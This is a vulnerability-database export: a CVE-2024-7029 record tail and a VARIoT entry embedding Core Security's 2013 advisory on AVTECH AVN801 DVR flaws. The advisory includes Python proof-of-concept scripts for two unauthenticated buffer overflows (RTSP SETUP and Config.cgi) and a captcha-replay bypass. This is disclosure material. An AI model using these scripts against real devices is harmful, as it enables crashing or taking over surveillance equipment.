"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-77",
"description": "CWE-77 Improper Neutralization of Special Elements used in a Command (\u0027Command Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-09-25T22:56:58.061Z",
"orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6",
"shortName": "icscert"
},
"references": [
{
"tags": [
"government-resource"
],
"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-214-07"
},
{
"url": "https://www.akamai.com/blog/security-research/2024-corona-mirai-botnet-infects-zero-day-sirt"
}
],
"solutions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eAVTECH SECURITY Corporation has not responded to requests to work with CISA to mitigate these vulnerabilities. Users of the affected products are encouraged to contact \u003c/span\u003e\u003ca target=\"_blank\" rel=\"nofollow\" href=\"https://www.avtech.com.tw/ContactUs.aspx\"\u003eAVTECH\u003c/a\u003e\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003e\u0026nbsp;for additional information.\u003c/span\u003e\n\n\u003cbr\u003e"
}
],
"value": "AVTECH SECURITY Corporation has not responded to requests to work with CISA to mitigate these vulnerabilities. Users of the affected products are encouraged to contact AVTECH https://www.avtech.com.tw/ContactUs.aspx \u00a0for additional information."
}
],
"source": {
"advisory": "ICSA-24-214-07",
"discovery": "EXTERNAL"
},
"title": "Command Injection in AVTech AVM1203 (IP Camera)",
"x_generator": {
"engine": "Vulnogram 0.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6",
"assignerShortName": "icscert",
"cveId": "CVE-2024-7029",
"datePublished": "2024-08-02T15:08:35.991Z",
"dateReserved": "2024-07-23T16:19:10.205Z",
"dateUpdated": "2025-01-09T19:22:30.663Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
VAR-201403-0123
Vulnerability from variot - Updated: 2023-12-18 12:30Buffer overflow in the RTSP Packet Handler in AVTECH AVN801 DVR with firmware 1017-1003-1009-1003 and earlier, and possibly other devices, allows remote attackers to cause a denial of service (device crash) and possibly execute arbitrary code via a long string in the URI in an RTSP SETUP request. AVTECH AVN801 is a digital video recorder product. When AVTECH AVN801 runs firmware version 1017-1003-1009-1003, the RTSP message handler handles the RTSP transaction with a buffer overflow vulnerability that does not require authentication. A remote attacker can cause device crashes and remote code execution. AVTECH AVN801 is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary-checks on user-supplied data. Failed exploit attempts may result in a denial-of-service condition. AVTECH AVN801 running firmware version 1017-1003-1009-1003 is vulnerable. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/
AVTECH DVR multiple vulnerabilities
- Advisory Information
Title: AVTECH DVR multiple vulnerabilities Advisory ID: CORE-2013-0726 Advisory URL: http://www.coresecurity.com/advisories/avtech-dvr-multiple-vulnerabilities Date published: 2013-08-28 Date of last update: 2013-08-28 Vendors contacted: AVTECH Corporation Release mode: User release
- Vulnerability Information
Class: Buffer overflow [CWE-119], Buffer overflow [CWE-119], Improper Access Control [CWE-284] Impact: Code execution, Security bypass Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2013-4980, CVE-2013-4981, CVE-2013-4982
- Vulnerability Description
Multiple vulnerabilities have been found in AVTECH AVN801 DVR [1] (and potentially other devices sharing the affected firmware) that could allow a remote attacker:
- [CVE-2013-4981] To execute arbitrary code without authentication by exploiting a buffer overflow in '/cgi-bin/user/Config.cgi', via a specially crafted HTTP POST request.
-
[CVE-2013-4982] To bypass the captcha of the administration login console enabling several automated attack vectors.
-
Vulnerable Packages
. DVR 4CH H.264 (AVTECH AVN801) firmware 1017-1003-1009-1003. Older versions are probably affected too, but they were not checked.
- Vendor Information, Solutions and Workarounds
There was no official answer from AVTECH support team after several attempts (see [Sec. 8]); contact vendor for further information. Some mitigation actions may be:
. Do not expose the DVR to internet unless absolutely necessary. Have at least one proxy filtering the 'SETUP' parameter in RTSP requests. Have at least one proxy filtering the 'Network.SMTP.Receivers' parameter in HTTP requests to '/cgi-bin/user/Config.cgi'.
- Credits
[CVE-2013-4980] was discovered and researched by Anibal Sacco from Core Security Exploit Writers Team. [CVE-2013-4981] and [CVE-2013-4982] were discovered and researched by Facundo Pantaleo from Core Security Consulting Team.
- Technical Description / Proof of Concept Code
7.1.
/----- import socket
HOST = '192.168.1.1'
PORT = 554
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
trigger_pkt = "SETUP
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2AaLSaLS
RTSP/1.0\r\n"
trigger_pkt += "CSeq: 1\r\n"
trigger_pkt += "User-Agent: VLC media player (LIVE555 Streaming Media
v2010.02.10)\r\n\r\n"
print "[] Sending trigger"
s.sendall(trigger_pkt)
data = s.recv(1024)
print '[] Response:', repr(data), "\r\n"
s.close()
-----/
7.2. Buffer Overflow in config.cgi Parameters
[CVE-2013-4981] The following Python script exploits other buffer overflow condition; no authentication is required.
/----- import httplib
ip = "192.168.1.1" conn = httplib.HTTPConnection(ip) conn.request("POST", "/cgi-bin/user/Config.cgi?action=set&Network.SMTP.Receivers=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1") resp = conn.getresponse() print resp.read() -----/
7.3. CAPTCHA Bypass
[CVE-2013-4982] The following Python proof of concept sends a wrong captcha in first place (just to verify that captcha protection is enabled); then, it sends ten requests with an arbitrary hardcoded captcha and its matching verification code. As a result, the captcha protection can by completely bypassed.
/----- import httplib
ip = "192.168.1.1" print "Performing captcha replay with hardcoded wrong captcha code and verify code..." conn = httplib.HTTPConnection(ip) conn.request("GET", "/cgi-bin/nobody/VerifyCode.cgi?account=YWRtaW46YWRtaW4=&captcha_code=FMUA&verify_code=FMUYyLOivRpgc HTTP/1.1") resp = conn.getresponse() print "Reading webpage..." print resp.read() print "Performing several captcha replays with hardcoded right captcha code and verify code..." for i in range(1, 10): conn = httplib.HTTPConnection(ip) conn.request("GET", "/cgi-bin/nobody/VerifyCode.cgi?account=YWRtaW46YWRtaW4=&captcha_code=FMUF&verify_code=FMUYyLOivRpgc HTTP/1.1") resp = conn.getresponse() print "Reading webpage..." print resp.read()
-----/
- Report Timeline
. 2013-08-06: Core Security Technologies attempts to contact vendor using the AVTECH official technical support contact page [2]. No reply received. 2013-08-12: Core attempts to contact vendor. 2013-08-20: Core attempts to contact vendor. 2013-08-28: After 3 attempts to contact vendor, the advisory CORE-2013-0726 is released as 'user release'.
- References
[1] http://www.avtech.com.tw. [2] http://www.avtech.com.tw/index.php?option=com_content&view=article&id=244&Itemid=453&lang=en.
- About CoreLabs
CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
- About Core Security Technologies
Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.
- Disclaimer
The contents of this advisory are copyright (c) 2013 Core Security Technologies and (c) 2013 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/.
- PGP/GPG Keys
This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201403-0123",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "avn801 dvr",
"scope": "eq",
"trust": 1.0,
"vendor": "avtech",
"version": null
},
{
"model": "avn801 dvr",
"scope": "lte",
"trust": 1.0,
"vendor": "avtech",
"version": "1017-1003-1009-1003"
},
{
"model": "avn801",
"scope": "eq",
"trust": 0.9,
"vendor": "avtech",
"version": "1017-1003-1009-1003"
},
{
"model": "avn801",
"scope": null,
"trust": 0.8,
"vendor": "avtech",
"version": null
},
{
"model": "avn801",
"scope": "lte",
"trust": 0.8,
"vendor": "avtech",
"version": "1017-1003-1009-1003"
},
{
"model": "avn801 dvr",
"scope": "eq",
"trust": 0.6,
"vendor": "avtech",
"version": "1017-1003-1009-1003"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-12744"
},
{
"db": "BID",
"id": "62033"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-006099"
},
{
"db": "NVD",
"id": "CVE-2013-4980"
},
{
"db": "CNNVD",
"id": "CNNVD-201308-456"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:avtech:avn801_dvr_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1017-1003-1009-1003",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:avtech:avn801_dvr:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2013-4980"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Anibal Sacco of Core Security",
"sources": [
{
"db": "BID",
"id": "62033"
},
{
"db": "CNNVD",
"id": "CNNVD-201308-456"
}
],
"trust": 0.9
},
"cve": "CVE-2013-4980",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 8.5,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 9.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2013-4980",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2013-12744",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-64982",
"impactScore": 8.5,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2013-4980",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2013-12744",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201308-456",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-64982",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-12744"
},
{
"db": "VULHUB",
"id": "VHN-64982"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-006099"
},
{
"db": "NVD",
"id": "CVE-2013-4980"
},
{
"db": "CNNVD",
"id": "CNNVD-201308-456"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Buffer overflow in the RTSP Packet Handler in AVTECH AVN801 DVR with firmware 1017-1003-1009-1003 and earlier, and possibly other devices, allows remote attackers to cause a denial of service (device crash) and possibly execute arbitrary code via a long string in the URI in an RTSP SETUP request. AVTECH AVN801 is a digital video recorder product. When AVTECH AVN801 runs firmware version 1017-1003-1009-1003, the RTSP message handler handles the RTSP transaction with a buffer overflow vulnerability that does not require authentication. A remote attacker can cause device crashes and remote code execution. AVTECH AVN801 is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary-checks on user-supplied data. Failed exploit attempts may result in a denial-of-service condition. \nAVTECH AVN801 running firmware version 1017-1003-1009-1003 is vulnerable. Core Security - Corelabs Advisory\nhttp://corelabs.coresecurity.com/\n\nAVTECH DVR multiple vulnerabilities\n\n\n1. *Advisory Information*\n\nTitle: AVTECH DVR multiple vulnerabilities\nAdvisory ID: CORE-2013-0726\nAdvisory URL:\nhttp://www.coresecurity.com/advisories/avtech-dvr-multiple-vulnerabilities\nDate published: 2013-08-28\nDate of last update: 2013-08-28\nVendors contacted: AVTECH Corporation\nRelease mode: User release\n\n\n2. *Vulnerability Information*\n\nClass: Buffer overflow [CWE-119], Buffer overflow [CWE-119], Improper\nAccess Control [CWE-284]\nImpact: Code execution, Security bypass\nRemotely Exploitable: Yes\nLocally Exploitable: No\nCVE Name: CVE-2013-4980, CVE-2013-4981, CVE-2013-4982\n\n\n3. *Vulnerability Description*\n\nMultiple vulnerabilities have been found in AVTECH AVN801 DVR [1] (and\npotentially other devices sharing the affected firmware) that could\nallow a remote attacker:\n\n 1. \n 2. [CVE-2013-4981] To execute arbitrary code without authentication\nby exploiting a buffer overflow in \u0027/cgi-bin/user/Config.cgi\u0027, via a\nspecially crafted HTTP POST request. \n 3. [CVE-2013-4982] To bypass the captcha of the administration login\nconsole enabling several automated attack vectors. \n\n\n4. *Vulnerable Packages*\n\n . DVR 4CH H.264 (AVTECH AVN801) firmware 1017-1003-1009-1003. Older versions are probably affected too, but they were not checked. \n\n\n5. *Vendor Information, Solutions and Workarounds*\n\nThere was no official answer from AVTECH support team after several\nattempts (see [Sec. 8]); contact vendor for further information. Some\nmitigation actions may be:\n\n . Do not expose the DVR to internet unless absolutely necessary. Have at least one proxy filtering the \u0027SETUP\u0027 parameter in RTSP\nrequests. Have at least one proxy filtering the \u0027Network.SMTP.Receivers\u0027\nparameter in HTTP requests to \u0027/cgi-bin/user/Config.cgi\u0027. \n\n\n6. *Credits*\n\n[CVE-2013-4980] was discovered and researched by Anibal Sacco from Core\nSecurity Exploit Writers Team. [CVE-2013-4981] and [CVE-2013-4982] were\ndiscovered and researched by Facundo Pantaleo from Core Security\nConsulting Team. \n\n\n7. *Technical Description / Proof of Concept Code*\n\n\n7.1. \n\n/-----\nimport socket\n\nHOST = \u0027192.168.1.1\u0027\nPORT = 554 \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((HOST, PORT))\ntrigger_pkt = \"SETUP\nAa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2AaLSaLS\nRTSP/1.0\\r\\n\"\ntrigger_pkt += \"CSeq: 1\\r\\n\"\ntrigger_pkt += \"User-Agent: VLC media player (LIVE555 Streaming Media\nv2010.02.10)\\r\\n\\r\\n\"\nprint \"[*] Sending trigger\"\ns.sendall(trigger_pkt)\ndata = s.recv(1024)\nprint \u0027[*] Response:\u0027, repr(data), \"\\r\\n\"\ns.close()\n-----/\n\n\n7.2. *Buffer Overflow in config.cgi Parameters*\n\n[CVE-2013-4981] The following Python script exploits other buffer\noverflow condition; no authentication is required. \n\n\n/-----\nimport httplib\n\nip = \"192.168.1.1\"\nconn = httplib.HTTPConnection(ip)\nconn.request(\"POST\",\n\"/cgi-bin/user/Config.cgi?action=set\u0026Network.SMTP.Receivers=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nHTTP/1.1\")\nresp = conn.getresponse()\nprint resp.read()\n-----/\n\n\n7.3. *CAPTCHA Bypass*\n\n[CVE-2013-4982] The following Python proof of concept sends a wrong\ncaptcha in first place (just to verify that captcha protection is\nenabled); then, it sends ten requests with an arbitrary hardcoded\ncaptcha and its matching verification code. As a result, the captcha\nprotection can by completely bypassed. \n\n\n/-----\nimport httplib\n\nip = \"192.168.1.1\"\nprint \"Performing captcha replay with hardcoded wrong captcha code and\nverify code...\"\nconn = httplib.HTTPConnection(ip)\nconn.request(\"GET\",\n\"/cgi-bin/nobody/VerifyCode.cgi?account=YWRtaW46YWRtaW4=\u0026captcha_code=FMUA\u0026verify_code=FMUYyLOivRpgc\nHTTP/1.1\")\nresp = conn.getresponse()\nprint \"Reading webpage...\"\nprint resp.read()\nprint \"Performing several captcha replays with hardcoded right captcha\ncode and verify code...\"\nfor i in range(1, 10):\n conn = httplib.HTTPConnection(ip)\n conn.request(\"GET\",\n\"/cgi-bin/nobody/VerifyCode.cgi?account=YWRtaW46YWRtaW4=\u0026captcha_code=FMUF\u0026verify_code=FMUYyLOivRpgc\nHTTP/1.1\")\n resp = conn.getresponse()\n print \"Reading webpage...\"\n print resp.read()\n\n-----/\n\n\n8. *Report Timeline*\n\n. 2013-08-06:\nCore Security Technologies attempts to contact vendor using the AVTECH\nofficial technical support contact page [2]. No reply received. 2013-08-12:\nCore attempts to contact vendor. 2013-08-20:\nCore attempts to contact vendor. 2013-08-28:\nAfter 3 attempts to contact vendor, the advisory CORE-2013-0726 is\nreleased as \u0027user release\u0027. \n\n\n9. *References*\n\n[1] http://www.avtech.com.tw. \n[2]\nhttp://www.avtech.com.tw/index.php?option=com_content\u0026view=article\u0026id=244\u0026Itemid=453\u0026lang=en. \n\n\n\n10. *About CoreLabs*\n\nCoreLabs, the research center of Core Security Technologies, is charged\nwith anticipating the future needs and requirements for information\nsecurity technologies. We conduct our research in several important\nareas of computer security including system vulnerabilities, cyber\nattack planning and simulation, source code auditing, and cryptography. \nOur results include problem formalization, identification of\nvulnerabilities, novel solutions and prototypes for new technologies. \nCoreLabs regularly publishes security advisories, technical papers,\nproject information and shared software tools for public use at:\nhttp://corelabs.coresecurity.com. \n\n\n11. *About Core Security Technologies*\n\nCore Security Technologies enables organizations to get ahead of threats\nwith security test and measurement solutions that continuously identify\nand demonstrate real-world exposures to their most critical assets. Our\ncustomers can gain real visibility into their security standing, real\nvalidation of their security controls, and real metrics to more\neffectively secure their organizations. \n\nCore Security\u0027s software solutions build on over a decade of trusted\nresearch and leading-edge threat expertise from the company\u0027s Security\nConsulting Services, CoreLabs and Engineering groups. Core Security\nTechnologies can be reached at +1 (617) 399-6980 or on the Web at:\nhttp://www.coresecurity.com. \n\n\n12. *Disclaimer*\n\nThe contents of this advisory are copyright (c) 2013 Core Security\nTechnologies and (c) 2013 CoreLabs, and are licensed under a Creative\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/. \n\n\n13. *PGP/GPG Keys*\n\nThis advisory has been signed with the GPG key of Core Security\nTechnologies advisories team, which is available for download at\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc",
"sources": [
{
"db": "NVD",
"id": "CVE-2013-4980"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-006099"
},
{
"db": "CNVD",
"id": "CNVD-2013-12744"
},
{
"db": "BID",
"id": "62033"
},
{
"db": "VULHUB",
"id": "VHN-64982"
},
{
"db": "PACKETSTORM",
"id": "122998"
}
],
"trust": 2.61
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-64982",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-64982"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2013-4980",
"trust": 3.5
